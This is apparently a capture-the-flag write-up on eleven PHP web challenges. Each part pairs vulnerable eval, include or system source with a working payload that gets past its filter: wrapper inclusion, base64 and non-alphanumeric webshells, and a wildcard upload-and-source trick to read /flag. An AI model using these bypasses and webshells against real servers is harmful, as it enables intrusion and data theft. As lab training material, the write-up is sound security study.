
chenxianz 2021-01-28 17:53 原文

AWCTF--web

web1

<?php
    
// Challenge source (web1). The request parameter `c` is handed to eval()
// after a single case-insensitive blocklist check; there is no allowlist,
// no sandbox and no authentication in front of it.
error_reporting(0); // hides every PHP error, so failures inside eval() are silent
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Blocklist: rejects only inputs that contain the substring "flag" (any case).
    // NOTE(review): a substring denylist is not a security control for eval();
    // whatever does not match the pattern is executed as PHP code.
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__); // no parameter supplied: print this file's own source
} 

c=system("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");

web2

<?php
​
// Challenge source (web2): same eval() sink as web1, the denylist now also
// rejects the words "system" and "php" (case-insensitive).
error_reporting(0); // all PHP error output suppressed
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Denylist on three substrings only; other PHP functions and constructs
    // are not inspected. NOTE(review): extending a blocklist word by word does
    // not close an eval() of request data - the sink itself is the defect.
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__); // show own source when `c` is absent
}

过滤了system,用同类函数passthru替换。

c=passthru("cd%20..;cd%20..;cd%20..;ls;cat%20f?ag");

web3

 <?php
​
// Challenge source (web3): eval() of `c`, with a longer denylist that now also
// rejects "cat", "sort", "shell", a literal dot, a literal space and a single quote.
error_reporting(0); // PHP errors are hidden
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Only the value of `c` is inspected; the check does not extend to any
    // other request data. NOTE(review): still a denylist in front of eval(),
    // so anything outside the listed tokens is executed as PHP.
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
} 

c=eval($_GET[1]);&1=system("cd%20..;cd%20..;cd%20..;ls;cat%20flag");

web4

又过滤了` ; echo (

<?php
​
// Challenge source (web4): the web3 denylist extended with the backtick,
// "echo", the semicolon and the opening parenthesis.
error_reporting(0); // PHP errors are hidden
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Denylist check on `c` only. Blocking "(" rules out ordinary function-call
    // syntax, but language constructs that take no parentheses (include, etc.)
    // are not in the list. NOTE(review): the eval() sink remains the real issue;
    // request data must never be evaluated as code.
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
} 

c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=/flag

web5

<?php
​
//flag in /flag
// Challenge source (web5): the sink is now include() on a request-controlled
// path - a file inclusion vulnerability. Which stream wrappers (data://, php://)
// include() accepts is governed by the php.ini setting allow_url_include.
error_reporting(0); // PHP errors are hidden
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Denylist: rejects only paths containing "flag" (any case).
    // NOTE(review): the proper control for include() is an allowlist of known
    // include targets, not a substring filter on the requested path.
    if(!preg_match("/flag/i", $c)){
        include($c);
        // echo $flag;
    }
        
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
} 

文件包含,使用data伪协议执行命令;因为过滤了flag,所以用?绕过。

?c=data://text/plain,<?php%20system("cat%20/fla?")?>

web6

<?php
​
// flag in /flag
// Challenge source (web6): include() of `c` as in web5; the denylist now also
// rejects the substrings "php" and "file".
error_reporting(0); // PHP errors are hidden
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Denylist on three substrings. NOTE(review): the filter inspects the path
    // string only, not the content that the path resolves to, so an encoded
    // payload behind a stream wrapper is not seen by it. Use an allowlist of
    // include targets instead.
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        // echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
} 

php也被过滤了,用base64编码绕过。

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg==

web7

<?php
​
​
// Challenge source (web7): eval() of `c` behind a character-class denylist.
// No error_reporting(0) here, so PHP warnings from eval()'d code are shown.
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // Rejects digits and most ASCII punctuation (including `$`, quotes, `.`,
    // `/` and the backslash) while letters, `(`, `)` and `;` are still allowed,
    // i.e. parameterless function-call chains pass.
    // NOTE(review): the sequence `\锛坾\锛墊` looks like mis-encoded fullwidth
    // parentheses `（|）` (UTF-8 bytes re-read as GBK) introduced when the
    // listing was copied; confirm against the original challenge source.
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\锛坾\锛墊\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
} 

参见https://www.freebuf.com/articles/web/261800.html

print_r(scandir(next(scandir(getcwd()))));读取上一级www目录

print_r(scandir(dirname(getcwd())));同上

print_r(scandir(next(scandir(dirname(chdir(dirname(getcwd())))))));读取var目录

print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));随机读取目录

?adad=system("cat%20/flag;");&c=eval(pos(pos(get_defined_vars())));

web8

<?php
​
// Challenge source (web8): unfiltered OS command injection. `c` is concatenated
// into a shell command line with no validation or escapeshellarg().
if(isset($_GET['c'])){
    $c=$_GET['c'];
    // The appended redirection only discards stdout/stderr of the resulting
    // command line; it does not restrict what is executed. A `;` inside `c`
    // ends the first command before the redirection applies.
    // NOTE(review): the defensive fix is an allowlist of permitted commands
    // plus escapeshellarg() on every argument, not output suppression.
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
} 

>/dev/null 2>&1的意思是丢弃命令输出(不回显),具体参见https://www.cnblogs.com/tinywan/p/6025468.html

?c=cat /flag;

web9

<?php
// Challenge source (web9): eval() of the `shell` parameter, guarded only by a
// "no letters or digits" check.
highlight_file(__FILE__); // always prints own source before handling the request
header("Content-type:text/html;charset=utf-8");
error_reporting(0); // hides PHP errors, including the notice when `shell` is absent
// Rejects any ASCII letter or digit; the /i flag makes [a-z] cover A-Z too.
// `$_GET['shell']` is read without an isset() check. NOTE(review): input made
// only of punctuation is still PHP code - this filter is not a control on eval().
if(preg_match('/[a-z0-9]/is',$_GET['shell'])){
    echo "hacker!!!";
}else{
    eval($_GET['shell']);
}
?>

无字母数字的webshell

参见https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

?shell=$_="{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=print_r(scandir('/'))

?shell=$_="{{{"^"?<>/";${$_}[_]();&_=phpinfo

?shell=$__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[$__]); [post data] 2=system("cat /flag");

web10

<?php
​
​
// Challenge source (web10): system() of `c` behind a character denylist.
// No error_reporting(0) here.
if(isset($_GET['c'])){
    $c=$_GET['c'];
    // Forbidden: `;`, letters (both cases via /i), digits, `$`, `(`, `{`,
    // both quotes, backtick, `%`, tab (\x09), `&` (\x26), `>` and `<`.
    // Path characters such as `/`, `.`, `?`, `[`, `]` and `+` are not listed.
    // NOTE(review): a denylist of shell metacharacters is not equivalent to an
    // allowlist; the command passed to system() should be built from a fixed
    // set of permitted values.
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
}

贴大佬文章https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

通过post上传一个文件,在上传过程中,用.(点)命令去执行这个文件。

新建一个页面来向靶机post数据

<!DOCTYPE html>
<!-- Minimal multipart/form-data upload page used in the writeup to POST a
     single file to the challenge instance (see the surrounding text). -->
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://49.232.149.138:10031/" method="post" enctype="multipart/form-data">
<!-- the action URL is the address of the challenge instance currently open -->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

上传的文件为

#!/bin/sh
# Contents of the file uploaded through the form above; per the writeup it is
# run on the target by sourcing it with the `.` command.
cat /flag

最后构造poc: ?c=.+/???/????????[@-[] (后面的[@-[]是linux下的匹配符,用来匹配大写字母。)

执行获得flag(每次上传的文件不一定有大写的文件名,需要多上传几次)。

web11

<?php
​
​
// Challenge source (web11): system() of `c` with a shorter denylist than web10 -
// digits, `$`, `(`, `{` and quotes are no longer rejected.
if(isset($_GET['c'])){
    $c=$_GET['c'];
    // Forbidden: `;`, letters (both cases via /i), backtick, `%`, tab (\x09),
    // `&` (\x26), `>` and `<`. NOTE(review): same sink as web10; the filter
    // should be replaced by an allowlist, not tuned.
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__); // print own source when `c` is missing
}

做法同上

 
